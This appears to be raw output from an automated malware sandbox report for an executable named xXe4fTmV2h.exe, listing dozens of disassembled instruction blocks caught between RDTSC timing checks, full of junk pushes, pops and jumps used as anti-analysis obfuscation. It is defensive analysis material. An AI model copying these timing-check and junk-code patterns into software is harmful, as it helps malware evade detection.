Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74100BE second address: 74100DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB0A5355D60h 0x00000008 movzx eax, di 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74100DE second address: 74100E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74100E4 second address: 741019D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A5355D5Eh 0x00000009 jmp 00007FB0A5355D65h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007FB0A5355D60h 0x00000015 or ax, 2028h 0x0000001a jmp 00007FB0A5355D5Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 pushfd 0x00000026 jmp 00007FB0A5355D64h 0x0000002b and cl, FFFFFF88h 0x0000002e jmp 00007FB0A5355D5Bh 0x00000033 popfd 0x00000034 mov di, cx 0x00000037 popad 0x00000038 mov ebx, dword ptr [eax+10h] 0x0000003b pushad 0x0000003c jmp 00007FB0A5355D60h 0x00000041 pushad 0x00000042 mov ax, di 0x00000045 popad 0x00000046 popad 0x00000047 push ecx 0x00000048 pushad 0x00000049 call 00007FB0A5355D64h 0x0000004e mov ecx, 54F279E1h 0x00000053 pop eax 0x00000054 movsx ebx, ax 0x00000057 popad 0x00000058 mov dword ptr [esp], esi 0x0000005b push eax 0x0000005c push edx 0x0000005d pushad 0x0000005e push eax 0x0000005f push edx 0x00000060 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741019D second address: 74101A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74101A2 second address: 74101A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74101A8 second address: 74101AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74101AC second address: 74101DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [757806ECh] 0x0000000e jmp 00007FB0A5355D5Bh 0x00000013 test esi, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FB0A5355D65h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74101DE second address: 7410290 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FB0A4FB6B7Fh 0x00000010 pushad 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FB0A4FB5B91h 0x00000018 sub ch, 00000026h 0x0000001b jmp 00007FB0A4FB5B91h 0x00000020 popfd 0x00000021 pushfd 0x00000022 jmp 00007FB0A4FB5B90h 0x00000027 and eax, 742370C8h 0x0000002d jmp 00007FB0A4FB5B8Bh 0x00000032 popfd 0x00000033 popad 0x00000034 pushfd 0x00000035 jmp 00007FB0A4FB5B98h 0x0000003a add eax, 0AC6F328h 0x00000040 jmp 00007FB0A4FB5B8Bh 0x00000045 popfd 0x00000046 popad 0x00000047 xchg eax, edi 0x00000048 jmp 00007FB0A4FB5B96h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FB0A4FB5B8Dh 0x00000057 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410290 second address: 74102A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D61h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74102A5 second address: 741030B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b mov ebx, eax 0x0000000d pushfd 0x0000000e jmp 00007FB0A4FB5B98h 0x00000013 sub ah, 00000078h 0x00000016 jmp 00007FB0A4FB5B8Bh 0x0000001b popfd 0x0000001c popad 0x0000001d call dword ptr [75750B60h] 0x00000023 mov eax, 7668E5E0h 0x00000028 ret 0x00000029 jmp 00007FB0A4FB5B96h 0x0000002e push 00000044h 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 mov di, cx 0x00000036 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741030B second address: 741030F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741030F second address: 7410355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 call 00007FB0A4FB5B96h 0x0000000b movzx esi, bx 0x0000000e pop edx 0x0000000f popad 0x00000010 pop edi 0x00000011 jmp 00007FB0A4FB5B8Ah 0x00000016 xchg eax, edi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FB0A4FB5B97h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410355 second address: 741035B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741035B second address: 741035F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741035F second address: 741036E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741036E second address: 741038E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B95h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741038E second address: 74103A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741041D second address: 7410422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410422 second address: 7410428 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410428 second address: 7410454 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B91h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FB1132A4DEFh 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB0A4FB5B8Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410454 second address: 741045A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741045A second address: 741045E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741045E second address: 7410482 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov edi, eax 0x00000012 movzx esi, bx 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410482 second address: 741049B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FB0A4FB5B95h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741049B second address: 741049F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741049F second address: 74104E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi], edi 0x0000000a jmp 00007FB0A4FB5B8Dh 0x0000000f mov dword ptr [esi+04h], eax 0x00000012 jmp 00007FB0A4FB5B8Eh 0x00000017 mov dword ptr [esi+08h], eax 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007FB0A4FB5B97h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74104E3 second address: 74105C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FB0A5355D5Fh 0x00000009 sbb ax, BFCEh 0x0000000e jmp 00007FB0A5355D69h 0x00000013 popfd 0x00000014 mov edx, eax 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esi+0Ch], eax 0x0000001c pushad 0x0000001d mov di, si 0x00000020 pushfd 0x00000021 jmp 00007FB0A5355D64h 0x00000026 add esi, 23544B78h 0x0000002c jmp 00007FB0A5355D5Bh 0x00000031 popfd 0x00000032 popad 0x00000033 mov eax, dword ptr [ebx+4Ch] 0x00000036 pushad 0x00000037 pushfd 0x00000038 jmp 00007FB0A5355D64h 0x0000003d add eax, 7F1AE5D8h 0x00000043 jmp 00007FB0A5355D5Bh 0x00000048 popfd 0x00000049 pushfd 0x0000004a jmp 00007FB0A5355D68h 0x0000004f add esi, 1F7E3038h 0x00000055 jmp 00007FB0A5355D5Bh 0x0000005a popfd 0x0000005b popad 0x0000005c mov dword ptr [esi+10h], eax 0x0000005f jmp 00007FB0A5355D66h 0x00000064 mov eax, dword ptr [ebx+50h] 0x00000067 push eax 0x00000068 push edx 0x00000069 push eax 0x0000006a push edx 0x0000006b pushad 0x0000006c popad 0x0000006d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74105C2 second address: 74105C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74105C8 second address: 74105CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74105CE second address: 7410619 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+14h], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FB0A4FB5B8Dh 0x00000016 pushfd 0x00000017 jmp 00007FB0A4FB5B90h 0x0000001c sbb eax, 71442F58h 0x00000022 jmp 00007FB0A4FB5B8Bh 0x00000027 popfd 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410619 second address: 7410663 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+54h] 0x0000000c jmp 00007FB0A5355D5Eh 0x00000011 mov dword ptr [esi+18h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FB0A5355D67h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410663 second address: 74106B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 4868593Ah 0x00000008 pushfd 0x00000009 jmp 00007FB0A4FB5B8Bh 0x0000000e adc si, B8DEh 0x00000013 jmp 00007FB0A4FB5B99h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov eax, dword ptr [ebx+58h] 0x0000001f jmp 00007FB0A4FB5B8Eh 0x00000024 mov dword ptr [esi+1Ch], eax 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74106B3 second address: 74106B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74106B7 second address: 74106BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74106BD second address: 74106D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, esi 0x00000005 mov dh, ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [ebx+5Ch] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74106D0 second address: 74106D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74106D4 second address: 74106E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74106E6 second address: 74107C8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 4514h 0x00000007 movsx edi, cx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esi+20h], eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007FB0A4FB5B92h 0x00000017 jmp 00007FB0A4FB5B95h 0x0000001c popfd 0x0000001d jmp 00007FB0A4FB5B90h 0x00000022 popad 0x00000023 mov eax, dword ptr [ebx+60h] 0x00000026 pushad 0x00000027 jmp 00007FB0A4FB5B8Eh 0x0000002c movzx ecx, di 0x0000002f popad 0x00000030 mov dword ptr [esi+24h], eax 0x00000033 pushad 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FB0A4FB5B94h 0x0000003b xor si, 4CB8h 0x00000040 jmp 00007FB0A4FB5B8Bh 0x00000045 popfd 0x00000046 popad 0x00000047 pushfd 0x00000048 jmp 00007FB0A4FB5B98h 0x0000004d and si, 8718h 0x00000052 jmp 00007FB0A4FB5B8Bh 0x00000057 popfd 0x00000058 popad 0x00000059 mov eax, dword ptr [ebx+64h] 0x0000005c jmp 00007FB0A4FB5B96h 0x00000061 mov dword ptr [esi+28h], eax 0x00000064 push eax 0x00000065 push edx 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007FB0A4FB5B8Ah 0x0000006d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74107C8 second address: 74107CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74107CC second address: 74107D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74107D2 second address: 7410800 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebx+68h] 0x0000000c jmp 00007FB0A5355D60h 0x00000011 mov dword ptr [esi+2Ch], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410800 second address: 7410804 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410804 second address: 741080A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741080A second address: 7410810 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410810 second address: 7410814 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410814 second address: 741084E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ax, word ptr [ebx+6Ch] 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FB0A4FB5B98h 0x00000013 or si, 5098h 0x00000018 jmp 00007FB0A4FB5B8Bh 0x0000001d popfd 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741084E second address: 7410893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FB0A5355D64h 0x0000000a sbb cl, FFFFFFF8h 0x0000000d jmp 00007FB0A5355D5Bh 0x00000012 popfd 0x00000013 popad 0x00000014 popad 0x00000015 mov word ptr [esi+30h], ax 0x00000019 pushad 0x0000001a movzx ecx, dx 0x0000001d call 00007FB0A5355D61h 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410893 second address: 74108A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov ax, word ptr [ebx+00000088h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74108A6 second address: 74108AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74108AC second address: 74108F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FB0A4FB5B97h 0x00000008 pop eax 0x00000009 mov ecx, edx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov word ptr [esi+32h], ax 0x00000012 pushad 0x00000013 pushad 0x00000014 mov bl, CCh 0x00000016 call 00007FB0A4FB5B98h 0x0000001b pop eax 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f movsx ebx, cx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74108F3 second address: 741090F instructions: 0x00000000 rdtsc 0x00000002 call 00007FB0A5355D5Ah 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [ebx+0000008Ch] 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741090F second address: 7410913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410913 second address: 7410917 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410917 second address: 741091D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741091D second address: 7410948 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D65h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+34h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FB0A5355D5Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410948 second address: 741097F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 6F6ADA52h 0x00000008 call 00007FB0A4FB5B93h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov eax, dword ptr [ebx+18h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FB0A4FB5B91h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 741097F second address: 7410985 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410985 second address: 74109F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A4FB5B8Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+38h], eax 0x0000000c jmp 00007FB0A4FB5B90h 0x00000011 mov eax, dword ptr [ebx+1Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FB0A4FB5B8Dh 0x0000001d sbb cl, FFFFFFE6h 0x00000020 jmp 00007FB0A4FB5B91h 0x00000025 popfd 0x00000026 pushfd 0x00000027 jmp 00007FB0A4FB5B90h 0x0000002c add ecx, 338D1788h 0x00000032 jmp 00007FB0A4FB5B8Bh 0x00000037 popfd 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74109F5 second address: 74109FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74109FB second address: 74109FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 74109FF second address: 7410A43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB0A5355D5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esi+3Ch], eax 0x0000000e pushad 0x0000000f mov bx, cx 0x00000012 pushfd 0x00000013 jmp 00007FB0A5355D60h 0x00000018 adc si, AD18h 0x0000001d jmp 00007FB0A5355D5Bh 0x00000022 popfd 0x00000023 popad 0x00000024 mov eax, dword ptr [ebx+20h] 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410A43 second address: 7410A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410A47 second address: 7410A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410A4B second address: 7410A51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410A51 second address: 7410A57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410A57 second address: 7410A5B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410A5B second address: 7410AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+40h], eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FB0A5355D5Eh 0x00000012 adc ecx, 0040CEA8h 0x00000018 jmp 00007FB0A5355D5Bh 0x0000001d popfd 0x0000001e mov ax, 819Fh 0x00000022 popad 0x00000023 lea eax, dword ptr [ebx+00000080h] 0x00000029 pushad 0x0000002a call 00007FB0A5355D60h 0x0000002f jmp 00007FB0A5355D62h 0x00000034 pop esi 0x00000035 mov si, dx 0x00000038 popad 0x00000039 push 00000001h 0x0000003b jmp 00007FB0A5355D5Dh 0x00000040 nop 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410AD1 second address: 7410AD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\xXe4fTmV2h.exeRDTSC instruction interceptor: First address: 7410AD5 second address: 7410ADB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
